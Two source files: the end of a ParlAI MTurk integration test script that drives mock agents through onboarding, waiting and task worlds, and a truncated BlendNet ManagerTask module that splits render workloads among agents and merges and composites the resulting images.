assert test_agent_2.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to task world'
check_status(assign_state_2.status, AssignState.STATUS_IN_TASK)
# Run agent_3 through onboarding
assert test_agent_3.conversation_id.startswith('o_'), \
'Mock agent didn\'t make it to onboarding'
test_agent_3.send_message('Onboard1', dummy)
wait_for_state_time(2, mturk_manager)
check_status(assign_state_3.status, AssignState.STATUS_ONBOARDING)
test_agent_3.send_message('Onboard2', dummy)
wait_for_state_time(2, mturk_manager)
# Ensure agent 3 is sitting in a waiting world now
assert test_agent_3.conversation_id.startswith('w_'), \
'Mock agent didn\'t make it to waiting'
check_status(assign_state_3.status, AssignState.STATUS_WAITING)
wait_for_state_time(2, mturk_manager)
first_agent = None
second_agent = None
assert test_agent_1.wants_to_send or test_agent_2.wants_to_send, \
'Neither agent is ready to send a message after arriving in task'
if test_agent_1.wants_to_send:
first_agent = test_agent_1
second_agent = test_agent_2
else:
second_agent = test_agent_1
first_agent = test_agent_2
# Step through the task
first_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
second_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
first_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
assert len(assign_state_1.messages) == 3, \
'Not all of the messages have been stored into the state, found {} ' \
'when expecting 3'.format(len(assign_state_1.messages))
assert len(assign_state_2.messages) == 3, \
'Not all of the messages have been stored into the state, found {} ' \
'when expecting 3'.format(len(assign_state_2.messages))
second_agent.send_message(expected_messages[message_num])
test_agent_1.always_beat = False
test_agent_2.always_beat = False
wait_for_state_time(5, mturk_manager)
# Assert that the two other agents were expired
check_status(assign_state_3.status, AssignState.STATUS_EXPIRED)
check_status(assign_state_4.status, AssignState.STATUS_EXPIRED)
assert last_command_3.data['text'] == data_model.COMMAND_EXPIRE_HIT, \
'Waiting world agent was not expired'
assert last_command_4.data['text'] == data_model.COMMAND_EXPIRE_HIT, \
'Onboarding world agent was not expired'
test_agent_3.always_beat = False
test_agent_4.always_beat = False
check_status(assign_state_1.status, AssignState.STATUS_DONE)
check_status(assign_state_2.status, AssignState.STATUS_DONE)
wait_for_state_time(DISCONNECT_WAIT_TIME, mturk_manager)
check_status(assign_state_1.status, AssignState.STATUS_DONE)
check_status(assign_state_2.status, AssignState.STATUS_DONE)
assert mturk_manager.completed_conversations == 1, \
'Complete conversation not marked as complete'
assert mturk_manager_assign_1.disconnected == False, \
'MTurk manager improperly marked the agent as disconnected'
assert mturk_manager_assign_2.disconnected == False, \
'MTurk manager improperly marked the agent as disconnected'
assert mturk_manager_assign_3.disconnected == False, \
'MTurk manager improperly marked the agent as disconnected'
assert mturk_manager_assign_4.disconnected == False, \
'MTurk manager improperly marked the agent as disconnected'
assert mturk_manager_assign_3.hit_is_expired == True, \
'MTurk manager failed to mark agent as expired'
assert mturk_manager_assign_4.hit_is_expired == True, \
'MTurk manager failed to mark agent as expired'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_1), \
'The socket manager didn\'t close the socket upon completion of the ' \
'task, though it should have'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_2), \
'The socket manager didn\'t close the socket upon completion of the ' \
'task, though it should have'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_3), \
'The socket manager didn\'t close the socket upon completion of the ' \
'task, though it should have'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_4), \
'The socket manager didn\'t close the socket upon completion of the ' \
'task, though it should have'
completed_threads[EXPIRE_HIT_TEST] = True
def test_allowed_conversations(opt, server_url):
"""Test to ensure that an agent can't take part in two conversations at
the same time when only one concurrent conversation is allowed, but that
they're allowed to start it after finishing the first
"""
global completed_threads
print('{} Starting'.format(ALLOWED_CONVERSATION_TEST))
opt['allowed_conversations'] = 1
opt['num_conversations'] = 2
opt['task'] = ALLOWED_CONVERSATION_TEST
hit_id = FAKE_HIT_ID.format(ALLOWED_CONVERSATION_TEST)
assign_id = FAKE_ASSIGNMENT_ID.format(ALLOWED_CONVERSATION_TEST, 1)
assign_id_2 = FAKE_ASSIGNMENT_ID.format(ALLOWED_CONVERSATION_TEST, 2)
worker_id = FAKE_WORKER_ID.format(ALLOWED_CONVERSATION_TEST, 1)
last_command = None
message_num = 0
expected_messages = [
TestSoloWorld.TEST_TEXT_1, TestSoloWorld.TEST_TEXT_2
]
mturk_agent_id = AGENT_1_ID
mturk_manager = MTurkManager(
opt=opt,
mturk_agent_ids=[mturk_agent_id],
is_test=True
)
mturk_manager.server_url = server_url
mturk_manager.start_new_run()
task_group_id = mturk_manager.task_group_id
world_thread = threading.Thread(target=run_solo_world,
args=(opt, mturk_manager, False))
world_thread.daemon = True
world_thread.start()
# Create an agent and set it up to connect
def msg_callback(packet):
nonlocal last_command
nonlocal message_num
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
last_command = packet
else:
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
test_agent = MockAgent(opt, hit_id, assign_id, worker_id, task_group_id)
message_handler = \
make_packet_handler(test_agent, dummy, dummy, msg_callback)
test_agent.setup_socket(server_url, message_handler)
test_agent.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent, mturk_manager, AssignState.STATUS_IN_TASK)
mturk_manager_assign = \
mturk_manager.mturk_workers[worker_id].agents[assign_id]
assign_state = mturk_manager_assign.state
test_agent.always_beat = True
test_agent.send_heartbeat()
wait_for_state_time(3, mturk_manager)
# Run through task
assert test_agent.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to task world'
assert last_command.data['text'] == data_model.COMMAND_SEND_MESSAGE, \
'Agent was not asked to send message {}'.format(message_num)
test_agent.send_message('Hello1', dummy)
wait_for_state_time(2, mturk_manager)
check_status(assign_state.status, AssignState.STATUS_IN_TASK)
assert len(assign_state.messages) == 3, \
'Not all of the messages have been stored into the state, found {} ' \
'when expecting 3'.format(len(assign_state.messages))
# Try to connect to second conversation
test_agent_2 = \
MockAgent(opt, hit_id, assign_id_2, worker_id, task_group_id)
message_handler = \
make_packet_handler(test_agent_2, dummy, dummy, msg_callback)
test_agent_2.setup_socket(server_url, message_handler)
test_agent_2.wait_for_alive()
wait_for_state_time(2, mturk_manager)
assert last_command.data['text'] == data_model.COMMAND_EXPIRE_HIT, \
'HIT was not immediately expired when connected'
# Finish first conversation
test_agent.send_message('Hello2', dummy)
test_agent.always_beat = False
wait_for_state_time(2, mturk_manager)
check_status(assign_state.status, AssignState.STATUS_DONE)
# Retry second conversation
last_command = None
message_num = 0
test_agent_2.send_alive()
test_agent_2.always_beat = False
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent_2, mturk_manager, AssignState.STATUS_IN_TASK)
mturk_manager_assign_2 = \
mturk_manager.mturk_workers[worker_id].agents[assign_id_2]
assign_state_2 = mturk_manager_assign_2.state
test_agent_2.always_beat = True
test_agent_2.send_heartbeat()
wait_for_state_time(3, mturk_manager)
# Run through task
assert test_agent_2.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to task world'
assert last_command.data['text'] == data_model.COMMAND_SEND_MESSAGE, \
'Agent was not asked to send message {}'.format(message_num)
test_agent_2.send_message('Hello1', dummy)
wait_for_state_time(2, mturk_manager)
check_status(assign_state_2.status, AssignState.STATUS_IN_TASK)
assert len(assign_state_2.messages) == 3, \
'Not all of the messages have been stored into the state, found {} ' \
'when expecting 3'.format(len(assign_state_2.messages))
test_agent_2.send_message('Hello2', dummy)
test_agent_2.always_beat = False
wait_for_state_time(2, mturk_manager)
check_status(assign_state_2.status, AssignState.STATUS_DONE)
wait_for_state_time(DISCONNECT_WAIT_TIME, mturk_manager)
check_status(assign_state.status, AssignState.STATUS_DONE)
assert len(assign_state.messages) == 0, \
'Messages were not cleared upon completion of the task'
assert mturk_manager_assign.disconnected == False, \
'MTurk manager improperly marked the agent as disconnected'
assert message_num == 2, 'Not all messages were successfully processed'
completed_threads[ALLOWED_CONVERSATION_TEST] = True
def test_unique_workers_in_conversation(opt, server_url):
"""Ensures that a worker cannot start a conversation with themselves
when not in the sandbox
"""
global completed_threads
print('{} Starting'.format(UNIQUE_CONVERSATION_TEST))
opt['task'] = UNIQUE_CONVERSATION_TEST
opt['is_sandbox'] = False
opt['count_complete'] = True
hit_id = FAKE_HIT_ID.format(UNIQUE_CONVERSATION_TEST)
worker_id_1 = FAKE_WORKER_ID.format(UNIQUE_CONVERSATION_TEST, 1)
worker_id_2 = FAKE_WORKER_ID.format(UNIQUE_CONVERSATION_TEST, 2)
assign_id_1 = FAKE_ASSIGNMENT_ID.format(UNIQUE_CONVERSATION_TEST, 1)
assign_id_2 = FAKE_ASSIGNMENT_ID.format(UNIQUE_CONVERSATION_TEST, 2)
assign_id_3 = FAKE_ASSIGNMENT_ID.format(UNIQUE_CONVERSATION_TEST, 3)
connection_id_1 = '{}_{}'.format(worker_id_1, assign_id_1)
connection_id_2 = '{}_{}'.format(worker_id_1, assign_id_2)
connection_id_3 = '{}_{}'.format(worker_id_2, assign_id_3)
message_num = 0
expected_messages = [
TestDuoWorld.MESSAGE_1, TestDuoWorld.MESSAGE_2,
TestDuoWorld.MESSAGE_3, TestDuoWorld.MESSAGE_4
]
mturk_agent_id_1 = AGENT_1_ID
mturk_agent_id_2 = AGENT_2_ID
mturk_manager = MTurkManager(
opt=opt,
mturk_agent_ids=[mturk_agent_id_1, mturk_agent_id_2],
is_test=True
)
mturk_manager.server_url = server_url
mturk_manager.start_new_run()
task_group_id = mturk_manager.task_group_id
world_thread = threading.Thread(target=run_duo_world,
args=(opt, mturk_manager, False))
world_thread.daemon = True
world_thread.start()
# create and set up the two agents for the one worker
test_agent_1 = MockAgent(opt, hit_id, assign_id_1,
worker_id_1, task_group_id)
def msg_callback_1(packet):
nonlocal message_num
nonlocal test_agent_1
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
if packet.data['text'] == data_model.COMMAND_SEND_MESSAGE:
test_agent_1.wants_to_send = True
elif test_agent_1.conversation_id.startswith('t_'):
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
message_handler_1 = \
make_packet_handler(test_agent_1, dummy, dummy, msg_callback_1)
test_agent_1.setup_socket(server_url, message_handler_1)
test_agent_1.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent_1, mturk_manager,
AssignState.STATUS_WAITING)
mturk_manager_assign_1 = \
mturk_manager.mturk_workers[worker_id_1].agents[assign_id_1]
assign_state_1 = mturk_manager_assign_1.state
# Start heartbeats for 1
test_agent_1.always_beat = True
test_agent_1.send_heartbeat()
wait_for_state_time(3, mturk_manager)
# Ensure agent 1 is sitting in a waiting world now
assert test_agent_1.conversation_id.startswith('w_'), \
'Mock agent didn\'t make it to waiting'
check_status(assign_state_1.status, AssignState.STATUS_WAITING)
# Set up the second agent
test_agent_2 = MockAgent(opt, hit_id, assign_id_2,
worker_id_1, task_group_id)
def msg_callback_2(packet):
nonlocal message_num
nonlocal test_agent_2
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
if packet.data['text'] == data_model.COMMAND_SEND_MESSAGE:
test_agent_2.wants_to_send = True
elif test_agent_2.conversation_id.startswith('t_'):
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
message_handler_2 = \
make_packet_handler(test_agent_2, dummy, dummy, msg_callback_2)
test_agent_2.setup_socket(server_url, message_handler_2)
test_agent_2.wait_for_alive()
wait_for_state_time(3, mturk_manager)
# Ensure no task has started yet
assert test_agent_2.conversation_id.startswith('w_'), \
'Mock agent didn\'t make it to waiting'
mturk_manager_assign_2 = \
mturk_manager.mturk_workers[worker_id_1].agents[assign_id_2]
assign_state_2 = mturk_manager_assign_2.state
check_status(assign_state_1.status, AssignState.STATUS_WAITING)
check_status(assign_state_2.status, AssignState.STATUS_WAITING)
# Start heartbeats for 2
test_agent_2.always_beat = True
test_agent_2.send_heartbeat()
wait_for_state_time(2, mturk_manager)
# Create third agent
test_agent_3 = MockAgent(opt, hit_id, assign_id_3,
worker_id_2, task_group_id)
def msg_callback_3(packet):
nonlocal message_num
nonlocal test_agent_3
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
if packet.data['text'] == data_model.COMMAND_SEND_MESSAGE:
test_agent_3.wants_to_send = True
elif test_agent_3.conversation_id.startswith('t_'):
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
message_handler_3 = \
make_packet_handler(test_agent_3, dummy, dummy, msg_callback_3)
test_agent_3.setup_socket(server_url, message_handler_3)
test_agent_3.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Start heartbeats for 3
test_agent_3.always_beat = True
test_agent_3.send_heartbeat()
# Assert that the state was properly set up
check_new_agent_setup(test_agent_3, mturk_manager,
AssignState.STATUS_IN_TASK)
mturk_manager_assign_3 = \
mturk_manager.mturk_workers[worker_id_2].agents[assign_id_3]
assign_state_3 = mturk_manager_assign_3.state
in_agent = None
in_assign = None
out_agent = None
out_assign = None
if assign_state_1.status == AssignState.STATUS_IN_TASK:
in_agent = test_agent_1
in_assign = mturk_manager_assign_1
out_agent = test_agent_2
out_assign = mturk_manager_assign_2
elif assign_state_2.status == AssignState.STATUS_IN_TASK:
out_agent = test_agent_1
out_assign = mturk_manager_assign_1
in_agent = test_agent_2
in_assign = mturk_manager_assign_2
else:
assert False, 'Neither agent moved into the task world'
wait_for_state_time(4, mturk_manager)
assert in_agent.wants_to_send or test_agent_3.wants_to_send, \
'Neither agent is ready to send a message after arriving in task'
first_agent = None
second_agent = None
if in_agent.wants_to_send:
first_agent = in_agent
second_agent = test_agent_3
else:
first_agent = test_agent_3
second_agent = in_agent
# Step through the task
first_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
second_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
first_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
assert len(in_assign.state.messages) == 3, \
'Not all of the messages have been stored into the state, found {} ' \
'when expecting 3'.format(len(in_assign.state.messages))
assert len(assign_state_3.messages) == 3, \
'Not all of the messages have been stored into the state, found {} ' \
'when expecting 3'.format(len(assign_state_3.messages))
second_agent.send_message(expected_messages[message_num])
test_agent_1.always_beat = False
test_agent_2.always_beat = False
wait_for_state_time(3, mturk_manager)
check_status(in_assign.state.status, AssignState.STATUS_DONE)
check_status(out_assign.state.status, AssignState.STATUS_EXPIRED)
check_status(assign_state_3.status, AssignState.STATUS_DONE)
wait_for_state_time(DISCONNECT_WAIT_TIME, mturk_manager)
check_status(in_assign.state.status, AssignState.STATUS_DONE)
check_status(out_assign.state.status, AssignState.STATUS_EXPIRED)
check_status(assign_state_3.status, AssignState.STATUS_DONE)
assert mturk_manager.completed_conversations == 1, \
'Complete conversation not marked as complete'
assert in_assign.disconnected == False, \
'MTurk manager improperly marked the agent as disconnected'
assert out_assign.disconnected == False, \
'MTurk manager improperly marked the agent as disconnected'
assert out_assign.hit_is_expired == True, \
'Expired HIT was not marked as such'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_1), \
'The socket manager didn\'t close the socket upon completion of the ' \
'task, though it should have'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_2), \
'The socket manager didn\'t close the socket upon completion of the ' \
'task, though it should have'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_3), \
'The socket manager didn\'t close the socket upon completion of the ' \
'task, though it should have'
completed_threads[UNIQUE_CONVERSATION_TEST] = True
# Map of tests to run to their testing function, slowest tests first reduces
# overall runtime
TESTS = {
DUO_NO_ONBOARDING_TEST: test_duo_no_onboarding,
SOLO_ONBOARDING_TEST: test_solo_with_onboarding,
DUO_ONBOARDING_TEST: test_duo_with_onboarding,
EXPIRE_HIT_TEST: test_expire_hit,
DUO_ONE_DISCONNECT_TEST: test_duo_one_disconnect,
DUO_VALID_RECONNECT_TEST: test_duo_valid_reconnects,
UNIQUE_CONVERSATION_TEST: test_unique_workers_in_conversation,
ALLOWED_CONVERSATION_TEST: test_allowed_conversations,
SOLO_REFRESH_TEST: test_solo_refresh_in_middle,
SOLO_NO_ONBOARDING_TEST: test_solo_no_onboarding,
COUNT_COMPLETE_TEST: test_count_complete,
SOCKET_TEST: test_socket_manager
}
# Runtime threads, MAX_THREADS is used on initial pass, RETEST_THREADS is used
# with flakey tests that failed under heavy load and thus may not have met
# the expected times for updating state
MAX_THREADS = 8
RETEST_THREADS = 2
def run_tests(tests_to_run, max_threads, base_opt, server_url):
global start_time
failed_tests = []
threads = {}
for test_name in tests_to_run:
while len(threads) >= max_threads:
new_threads = {}
for n in threads:
if threads[n].is_alive():
new_threads[n] = threads[n]
else:
if n in completed_threads:
print("{} Passed. Runtime - {} Seconds".format(
n,
time.time() - start_times[n]
))
else:
print("{} Failed. Runtime - {} Seconds".format(
n,
time.time() - start_times[n]
))
failed_tests.append(n)
threads = new_threads
time.sleep(1)
new_thread = threading.Thread(target=TESTS[test_name],
args=(base_opt.copy(), server_url))
new_thread.start()
start_times[test_name] = time.time()
threads[test_name] = new_thread
time.sleep(0.25)
while len(threads) > 0:
new_threads = {}
for n in threads:
if threads[n].is_alive():
new_threads[n] = threads[n]
else:
if n in completed_threads:
print("{} Passed. Runtime - {} Seconds".format(
n,
time.time() - start_times[n]
))
else:
print("{} Failed. Runtime - {} Seconds".format(
n,
time.time() - start_times[n]
))
failed_tests.append(n)
threads = new_threads
time.sleep(1)
return failed_tests
def main():
start_time = time.time()
argparser = ParlaiParser(False, False)
argparser.add_parlai_data_path()
argparser.add_mturk_args()
base_opt = argparser.parse_args()
base_opt['is_sandbox'] = True
base_opt['num_conversations'] = 1
base_opt['count_complete'] = False
task_name, server_url = handle_setup(base_opt)
print ("Setup time: {} seconds".format(time.time() - start_time))
start_time = time.time()
try:
failed_tests = run_tests(TESTS, MAX_THREADS, base_opt, server_url)
if len(failed_tests) == 0:
print("All tests passed, ParlAI MTurk is functioning")
else:
print("Some tests failed: ", failed_tests)
print("Retrying flakey tests with fewer threads")
flakey_tests = {}
for test_name in failed_tests:
flakey_tests[test_name] = TESTS[test_name]
failed_tests = run_tests(flakey_tests, RETEST_THREADS, \
base_opt, server_url)
if len(failed_tests) == 0:
print("All tests passed, ParlAI MTurk is functioning")
else:
print("Some tests failed even on retry: ", failed_tests)
test_duration = time.time() - start_time
print("Test duration: {} seconds".format(test_duration))
except:
raise
finally:
handle_shutdown(task_name)
if __name__ == '__main__':
main()
|
ManagerTask.py
|
#!/usr/bin/python3
# -*- coding: UTF-8 -*-
'''BlendNet ManagerTask
Description: Task used by Manager to control jobs
'''
import os
import time
import threading
import subprocess
import statistics # Calculate good remaining time
from .TaskBase import TaskConfig, TaskState, TaskBase
class ManagerTaskConfig(TaskConfig):
def __init__(self, parent):
self._defs['agents_num'] = {
'description': '''How many agents to use from the pool''',
'type': int,
'validation': lambda cfg, val: val <= cfg._parent._parent._cfg.agents_max,
'min': 0,
'default': lambda cfg: cfg._parent._parent._cfg.agents_max,
}
self._defs['use_compositing_nodes'] = {
'description': '''Use compositing nodes from the project''',
'type': bool,
'default': True,
}
self._defs['compose_filepath'] = {
'description': '''Where to place the task compose result on the Addon side''',
'type': str,
'default': None,
}
super().__init__(parent)
class ManagerTask(TaskBase):
def __init__(self, manager, name, data = {}):
super().__init__(manager, name, ManagerTaskConfig(self), data)
with self._status_lock:
self._status.update({
'start_time_actual': self._status.get('start_time_actual'), # Time when the first agent task started
'samples_per_workload': self._status.get('samples_per_workload'), # How many samples the manager gives to one agent
'samples_acquired': self._status.get('samples_done', 0), # How many samples have been taken for processing by agents
'workloads_taken': self._status.get('workloads_taken', 0), # How many agent tasks have been taken
'results_processing': self._status.get('results_processing'), # While results are still processing the task can't be completed
'compose_filepath': self._status.get('compose_filepath'), # Composed image filepath to store the image on the Addon
})
self._status['result']['compose'] = self._status['result'].get('compose', None) # Blob ID of the composed image
# Task executions by agents
self._executions = {}
# Info about the execution statuses used in the execution watcher
self._execution_status = data.get('execution_status', {})
# Task execution results and processor
self._results_preview_lock = threading.Lock()
self._results_preview = data.get('results_preview', {})
self._results_render_lock = threading.Lock()
self._results_render = data.get('results_render', {})
self._results_watcher = None
self._results_to_remove_lock = threading.Lock()
self._results_to_remove = set()
self._stop_task = False # Used to stop the task
print('DEBUG: Created Manager task', name)
def snapshot(self):
'''Returns dict with all the data about task to restore it later'''
out = super().snapshot()
out.update({
'execution_status': self._execution_status.copy(),
'results_preview': self._results_preview.copy(),
'results_render': self._results_render.copy(),
})
return out
def statusResultsProcessingSet(self, val):
with self._status_lock:
self._status['results_processing'] = val
def _resultsWatcher(self):
'''Merges multiple results from a number of agents into one result'''
print('DEBUG: Starting ManagerTask "%s" results watcher' % self.name())
prev_preview = set()
while True:
to_merge = None
to_compose = None
# Preview merge takes priority; it's merged often to provide quick updates for the Addon
with self._results_preview_lock:
blobs = set(self._results_preview.values())
if blobs != prev_preview:
to_merge = (self.statusPreviewSet, blobs)
prev_preview = blobs.copy()
# Next check to merge render results, executed once when all the samples are ready
if not to_merge:
to_render = False
if (not self._status['result']['render']
and self.isRenderComplete()
and not self._stop_task):
to_render = True
if to_render:
with self._results_render_lock:
to_merge = (self.statusRenderSet, set(self._results_render.values()))
print('INFO: Merging %s render results for task "%s"' % (len(to_merge[1]), self.name()))
print('DEBUG: Blobs to merge:', to_merge[1])
# Lastly check if it's time for compositing, executed once when render is completed
if not to_merge:
with self._status_lock:
if (not self._status['result']['compose']
and self._status['result']['render']
and not self._stop_task):
to_compose = True
if not to_merge:
if not to_compose:
self.statusResultsProcessingSet(False)
if not self.isRunning():
self.statusResultsProcessingSet(False)
break # If all the requests were processed and the task is not running - stop
if not to_compose:
time.sleep(1.0)
continue
self.statusResultsProcessingSet(True)
if to_merge:
self._mergeWorker(to_merge)
elif to_compose:
self._composeWorker()
self._results_watcher = None
print('DEBUG: Stopped ManagerTask "%s" results watcher' % self.name())
def _mergeWorker(self, to_merge):
'''Merge the multiple preview or render images to one'''
print('DEBUG: Merge started for task "%s"' % (self.name(),))
try:
if len(to_merge[1]) == 1:
# Sending directly to results just one image to merge
to_merge[0](to_merge[1].pop())
else:
files = dict([ (blob + '.exr', blob) for blob in to_merge[1] ])
cfg = {
'images': [ 'project/' + f for f in files.keys() ],
'result': 'result.exr',
}
with self.prepareWorkspace(files) as ws_path:
process = self.runBlenderScriptProcessor(ws_path, 'merge', cfg)
self._processOutputs(process, show_out=(to_merge[0] == self.statusRenderSet))
blob = self._parent._fc.blobStoreFile(os.path.join(ws_path, cfg['result']), True)
if not blob:
print('ERROR: Unable to store blob for merge result of "%s"' % self.name())
return
print('DEBUG: Merge result:', blob['id'], blob['size'])
to_merge[0](blob['id'])
except Exception as e:
print('ERROR: Exception occurred during merging the results for task "%s": %s: %s' % (self.name(), type(e), e))
# Critical only on render merge
if to_merge[0] == self.statusRenderSet:
self.stateError({self.name(): 'Exception occurred during merging the results: %s' % (e,)})
print('DEBUG: Merge completed for task "%s"' % (self.name(),))
# Clean the old result blobs
with self._results_to_remove_lock:
if not self._results_to_remove:
return
print('DEBUG: Running cleaning of %s result blobs' % len(self._results_to_remove))
for blob_id in self._results_to_remove.copy():
if self._parent._fc.blobRemove(blob_id):
self._results_to_remove.remove(blob_id)
print('DEBUG: Merge clean completed for task "%s"' % (self.name(),))
def _composeWorker(self):
'''Running blender instance to compose and export the rendered image'''
print('DEBUG: Starting composite process for task "%s"' % (self.name(),))
try:
with self._status_lock:
# Composition can use dependencies - so getting them all to the workspace
files_map = self.filesGet()
# And updating deps with the rendered image to replace the render layer node
render_name = 'blendnet-' + self._status['result']['render'][:6]
files_map.update({
render_name + '.exr': self._status['result']['render'],
})
cfg = {
'use_compositing_nodes': self._cfg.use_compositing_nodes,
'frame': self._cfg.frame,
'render_file_path': 'project/' + render_name + '.exr',
'result_dir': render_name + '-result',
'project_path': self._cfg.project_path,
'cwd_path': self._cfg.cwd_path,
}
print('DEBUG: Files to use in workspace:')
for path in sorted(files_map):
print('DEBUG: ', files_map[path], path)
with self.prepareWorkspace(files_map) as ws_path:
process = self.runBlenderScriptProcessor(ws_path, 'compose', cfg, blendfile=self._cfg.project)
self._processOutputs(process, show_out=True)
# Check the result_dir and set the compose result if the result file is there
for filename in os.listdir(os.path.join(ws_path, cfg['result_dir'])):
blob = self._parent._fc.blobStoreFile(os.path.join(ws_path, cfg['result_dir'], filename), True)
if not blob:
print('ERROR: Unable to store blob for compose result of', self.name())
return
self.statusComposeSet(blob['id'])
break
if not self._status['result']['compose']:
self.stateError({self.name(): 'Result file of the compose operation not found'})
except Exception as e:
print('ERROR: Exception occurred during composing the result for task "%s": %s: %s' % (self.name(), type(e), e))
self.stateError({self.name(): 'Exception occurred during composing the result: %s' % (e,)})
print('DEBUG: Compositing completed for task', self.name())
def _processOutputs(self, process, show_out = False):
'''Shows info from the process'''
outb = b''
errb = b''
outs = ''
errs = ''
try:
outb, errb = process.communicate(timeout=360)
except subprocess.TimeoutExpired:
process.kill()
outb, errb = process.communicate()
raise
finally:
if process.poll() == -9: # OOM kill
self.stateError({self.name(): 'The process was killed by Out Of Memory - try to use bigger VM for the Manager'})
# On Windows it's hard to predict which encoding will be used
try:
try:
outs = outb.decode('utf-8')
errs = errb.decode('utf-8')
except (LookupError, UnicodeDecodeError):
# UTF-8 didn't work, so it's probably latin-1
outs = outb.decode('iso-8859-1')
errs = errb.decode('iso-8859-1')
if process.returncode != 0 or errs or show_out:
print('INFO: Process stdout:')
for line in outs.split('\n'):
print(' ' + line)
if process.returncode != 0 or errs:
print('WARN: The process does not seem to have ended well...')
print('WARN: Process stderr:')
for line in errs.split('\n'):
print(' ' + line)
except (LookupError, UnicodeDecodeError) as e:
print('ERROR: Unable to decode the blender stdout/stderr data:', type(e), e)
return outs
def isRenderComplete(self):
'''Checks that all the tasks were completed and the results were downloaded'''
# Only completed or stopped tasks can contain render results
task_end_states = {TaskState.COMPLETED.name, TaskState.STOPPED.name}
# Stopped tasks could contain no rendered samples
good_tasks = [ task for task in self._execution_status.values()
if task.get('state') in task_end_states
and task.get('samples_done') > 0
]
tasks_set = set([ task.get('name') for task in good_tasks ])
tasks_samples = sum([ task.get('samples_done') for task in good_tasks ])
# Making sure all the samples-containing tasks are in the render results
# and the completed samples are more than or equal to the required samples
return (tasks_set and tasks_set == set(self._results_render.keys())
and tasks_samples >= self._cfg.samples)
def calculateWorkloadSamples(self, samples, agents):
'''Calculating optimal number of samples per agent'''
from math import ceil, floor
out = min(ceil(samples/agents), 100)
batches = floor(samples/(out*agents))
if batches > 0:
out += ceil(samples%(out*agents)/(batches*agents))
return ceil(out/2) if out > 140 else out
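# A worked example of the arithmetic above (hypothetical numbers, purely
# illustrative): with samples=1000 and agents=4 the first pass caps the
# workload at min(ceil(1000/4), 100) = 100 samples, batches = floor(1000/400) = 2,
# and the remainder 1000 % 400 = 200 adds ceil(200 / (2*4)) = 25, so each
# acquired workload carries 125 samples. Any workload above 140 samples would
# be halved by the final guard.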
def acquireWorkload(self, agent):
'''Returns map with parameters for agent to process'''
with self._status_lock:
if self._stop_task or not self.isRunning():
return {} # Stopping in progress - no more workloads
left_to_acquire = self._cfg.samples - self._status['samples_acquired']
# "<=" just in case when more samples was calculated to prevent endless task
if left_to_acquire <= 0:
return {} # No work is available
if not self._status['samples_per_workload']:
self._status['samples_per_workload'] = self.calculateWorkloadSamples(self._cfg.samples, self._cfg.agents_num)
workload = self.configsGet()
# TODO: Dynamically change min samples according to the
# time to render and loading/rendering ratio
workload['samples'] = min(left_to_acquire, self._status['samples_per_workload'])
self._status['samples_acquired'] += workload['samples']
# Append to seed to make agent render unique
workload['seed'] += self._status['workloads_taken']
workload['task_name'] = '%s_%d' % (self.name(), self._status['workloads_taken'])
# Put agent task into executions list
with self._execution_lock:
self._executions[workload['task_name']] = agent
self._status['workloads_taken'] += 1
return workload
def returnAcquiredWorkload(self, samples):
'''If the agent was not able to complete the task, it can return the samples back'''
with self._status_lock:
self._status['samples_acquired'] -= samples
def updatePreview(self, agent_task, blob_id):
'''Run process of merging the available previews and update the task results'''
print('DEBUG: Updating preview for task "%s" blob id "%s"' % (agent_task, blob_id))
old_blob_id = None
with self._results_preview_lock:
old_blob_id = self._results_preview.get(agent_task)
if blob_id is None:
if agent_task in self._results_preview:
self._results_preview.pop(agent_task)
else:
self._results_preview[agent_task] = blob_id
if old_blob_id:
with self._results_to_remove_lock:
self._results_to_remove.add(old_blob_id)
def updateRender(self, agent_task, blob_id):
'''Run process of merging the available renders and update the task results'''
print('DEBUG: Updating render for task "%s" blob id "%s"' % (agent_task, blob_id))
old_blob_id = None
with self._results_render_lock:
old_blob_id = self._results_render.get(agent_task)
if blob_id is None:
if agent_task in self._results_render:
self._results_render.pop(agent_task)
else:
self._results_render[agent_task] = blob_id
if old_blob_id:
with self._results_to_remove_lock:
self._results_to_remove.add(old_blob_id)
def _executionWatcher(self):
'''Watches the task execution on the agents and collects the renders together'''
print('DEBUG: Execution watcher of task "%s" is started' % self.name())
# Will help us to combine results
if not self._results_watcher:
self._results_watcher = threading.Thread(target=self._resultsWatcher)
self._results_watcher.start()
task_end_states = {TaskState.STOPPED.name, TaskState.COMPLETED.name, TaskState.ERROR.name}
update_messages_time = 0
while self.isRunning():
if self._parent.isTerminating():
self.stop()
with self._execution_lock:
executions = self._executions.copy()
for task_name, agent in executions.items():
